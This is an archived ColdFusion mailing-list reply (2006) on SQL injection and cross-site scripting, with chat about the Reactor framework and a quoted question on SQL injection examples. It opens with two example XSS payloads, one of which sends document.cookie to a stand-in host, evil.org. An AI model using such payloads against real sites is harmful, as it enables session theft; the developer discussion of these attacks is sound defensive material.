More evil is stuff like: <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js' <http://evil.org/badkama.js%27>></SCRIPT>"> Go to trusted.org</A> OR <img src="http://trusted.org/account.asp?ak=<script> document.location.replace ('http://evil.org/steal.cgi?'+document.cookie);<http://evil.org/steal.cgi?%27+document.cookie%29;> </script>
I've always hated cfqueryparaming everything, or generally hand-coding any database CRUD. Not to say I've been using DAO stuff or whatnot, but I soon wrote a custom cfInsertOrUpdate type deal (as many probably do)... anyway, long story short, having all the database stuff in one place makes it easier to modify the database stuff, obviously. I'm really digging reactor. Really really. It's slow as hell with debugging on (and thus my query regarding enabling/disabling debugging in finer detail). Other than that though it's nifty. Guess I should build any dubugging I need anyway, just in case I need it on a production server anyways, right. Now if I could just wank out a GenericCommit(or whatever) like Model Glue 2 does, and dump all these getters and setters, I'd be stoked. ;-) Maybe I should just use MG, and say fudge it... eh... we'll see. I figure if I use Reactor, I can always move to MVC and not duplicate the work later, db-wise... At any rate, these guys are getting sneaky, and it's sad how locked down you really have to be to be secure... if that's even possible. Were talking pinball type deals, bang- off the browser, bang- off the db, bang-off the webserver, bang- off the parseing engine... seems to me it's pretty much always like flying a heliocopter- trying to wrangle all the interacting technologies in a sane manner... and bang- that's why I like the idea of reactor. At least it's all in one spot, ya know? :-P Ok, sorry for the tyrade. :Denn A link for stuff cfqueryparam might not catch (with examples): http://www.technicalinfo.net/papers/CSS.html On 8/22/06, Russ < [EMAIL PROTECTED]> wrote: > > Now, it is my belief that CF auto escapes single quotes, so sql injection > into a string is not possible. I believe it's still possible if you have > a > number, but pass in a string, but that can be defeated by using VAL. > > > > Someone pointed me to an article from 2 years ago that describes how to do > > sql injection with CF: > http://coldfusion.sys-con.com/read/46358.htm?CFID=472470 > <http://coldfusion.sys-con.com/read/46358.htm?CFID=472470&CFTOKEN=B2D822C3-1 > 3E7-B7E0-0702115FF33798C6> &CFTOKEN=B2D822C3-13E7-B7E0-0702115FF33798C6 > > > > I couldn't get the example in there to work. > > > > Other then putting in an injection string into a numeric argument, are > there > any other examples of doing SQL injection with ColdFusion? > > > > Russ > > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hitting, up-to-date ColdFusion information by your peers, delivered to your door four times a year. http://www.fusionauthority.com/quarterly Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:250991 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
